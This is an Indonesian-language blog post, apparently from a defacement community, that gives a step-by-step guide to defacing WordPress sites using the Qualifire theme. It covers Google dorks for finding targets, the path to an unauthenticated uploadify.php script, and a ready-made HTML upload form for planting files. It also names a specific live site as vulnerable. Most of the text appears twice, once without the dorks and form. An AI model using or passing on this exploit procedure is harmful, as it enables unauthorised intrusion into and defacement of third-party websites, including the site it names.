Cara Deface Wordpress Themes Qualifire File Upload Lengkap
Hey Bung ni Gua Mau Share Poc Wp-theme Upload ,Teknik Ini Agak Sedikit Rumit :v Tapi Sebenarnya Mudah Cuma Harus Teliti :D .Nah TEKNIK ini Bisa Upload File html :) Jadi TAMpilan-nya AKan KEREN Seperti Script Yg anda Buat :D
Oke Gak USAH banyak Cincong Nih Stepnya :
1.Seperti Biasa Search Dork Ke Mbah Google
Dork:
(Dork bisa Lu Kembangin sendiri biar tambah banyak site-nya:contoh site:ru ,fr ,br , my ,dll )
(cari site atau target-nya mbah )
2.Setelah Mendapat Target Masukan Exploit dibelakang site-nya
EXPLOIT :
Contoh : target.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
lihat gambar
Nih site yg belum dikasih Exploit Masih Polos
Kemudian Kasih Exploit dibelakang targetnya,apa bila vuln Nanti site nya akan Blank(Kosong /muncul 404)
Nih Site yg udah dikasih Exploit & dan hasilnya akan blank
lihat ss
3.Copy Code CRSF berikut di Notepad & Save Dengan extensi html
#CATATAN:yg ditandai garis tebal ubah dengan target lu Mbah
Save code diatas dan simpan Extensi File html
4.Kemudian Kita Klik/Jalankan CRSF nya.
Caranya :
1.cari file Script lu mbah
2.Tinggal Submit/Upload
lihat SS-nya AGra Lebih Jelas
5.Setelah Diupload Selesai Kita Tinggal AKsesnya File Kita .
AKSES: Target.com/NAMA FILE KAMU.HTM
Contoh : kimcil.com/Mr.212.html
Nah Nanti Akan muncul Hasilnya Seperti Dibawah
#CATATAN
Nih Gua Kasih Site Vuln Wp-theme:
http://www.depal.it/
Mudah-kan Hanya Kita TiNGAL Teliti AJha Jangan Sampai Ada yg SAlah Step-stepnya :)
#Selamat Mencoba Mbah
#Bila Kurang jelas Komen AJHA
#Sekian wassalamualaikum.wr.wb
Oke Gak USAH banyak Cincong Nih Stepnya :
1.Seperti Biasa Search Dork Ke Mbah Google
Dork:
- inurl:"/wp-content/themes/qualifire"
- inurl:"/wp-content/themes/qualifire" site:.com
(cari site atau target-nya mbah )
2.Setelah Mendapat Target Masukan Exploit dibelakang site-nya
EXPLOIT :
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Contoh : target.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
lihat gambar
Nih site yg belum dikasih Exploit Masih Polos
Kemudian Kasih Exploit dibelakang targetnya,apa bila vuln Nanti site nya akan Blank(Kosong /muncul 404)
Nih Site yg udah dikasih Exploit & dan hasilnya akan blank
lihat ss
3.Copy Code CRSF berikut di Notepad & Save Dengan extensi html
<form
action="http://TARGET.COM//wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
#CATATAN:yg ditandai garis tebal ubah dengan target lu Mbah
Save code diatas dan simpan Extensi File html
4.Kemudian Kita Klik/Jalankan CRSF nya.
Caranya :
1.cari file Script lu mbah
2.Tinggal Submit/Upload
lihat SS-nya AGra Lebih Jelas
5.Setelah Diupload Selesai Kita Tinggal AKsesnya File Kita .
AKSES: Target.com/NAMA FILE KAMU.HTM
Contoh : kimcil.com/Mr.212.html
Nah Nanti Akan muncul Hasilnya Seperti Dibawah
#CATATAN
Nih Gua Kasih Site Vuln Wp-theme:
http://www.depal.it/
Mudah-kan Hanya Kita TiNGAL Teliti AJha Jangan Sampai Ada yg SAlah Step-stepnya :)
#Selamat Mencoba Mbah
#Bila Kurang jelas Komen AJHA
#Sekian wassalamualaikum.wr.wb
0 Response to "Cara Deface Wordpress Themes Qualifire File Upload Lengkap "
Post a Comment